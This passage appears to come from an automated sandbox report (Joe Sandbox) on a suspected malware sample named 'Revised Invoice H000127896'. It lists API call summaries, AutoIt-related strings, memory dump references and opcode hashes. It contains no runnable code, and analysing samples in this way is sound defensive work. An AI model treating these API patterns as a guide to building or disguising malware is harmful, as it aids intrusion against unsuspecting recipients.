                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                              • LineTo.GDI32(?,?,?), ref: 00447326
                              • EndPath.GDI32(?), ref: 00447336
                              • StrokePath.GDI32(?), ref: 00447344
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                              • String ID:
                              • API String ID: 2783949968-0
                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472B63
                              • GetDC.USER32(00000000), ref: 00472B6C
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472BB2
                              • GetDC.USER32(00000000), ref: 00472BBB
                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                              APIs
                              • __getptd_noexit.LIBCMT ref: 00415150
                                • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                              • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                              • __freeptd.LIBCMT ref: 0041516B
                              • ExitThread.KERNEL32 ref: 00415173
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                              • String ID:
                              • API String ID: 1454798553-0
                              • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                              • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _strncmp
                              • String ID: Q\E
                              • API String ID: 909875538-2189900498
                              • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                              • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                              APIs
                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 2652923123-3941886329
                              • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                              • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: U$\
                              • API String ID: 2666721431-100911408
                              • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                              • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • __wcsnicmp.LIBCMT ref: 00467288
                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                              • String ID: LPT
                              • API String ID: 3035604524-1350329615
                              • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                              • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                              • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                              • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$h
                              • API String ID: 4104443479-677774858
                              • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                              • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                              • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                              • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID: &
                              • API String ID: 2931989736-1010288
                              • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                              • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                              • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                              • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                              • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                              • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                              • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                              APIs
                              • _wcslen.LIBCMT ref: 00466825
                              • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CrackInternet_wcslen
                              • String ID: |
                              • API String ID: 596671847-2343686810
                              • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                              • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                              • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                              • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                              APIs
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: '
                              • API String ID: 3850602802-1997036262
                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                              • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                              APIs
                              • _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                              • _sprintf.LIBCMT ref: 0040F9AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove$_sprintf_strlen
                              • String ID: %02X
                              • API String ID: 1921645428-436463671
                              • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                              • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                              • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
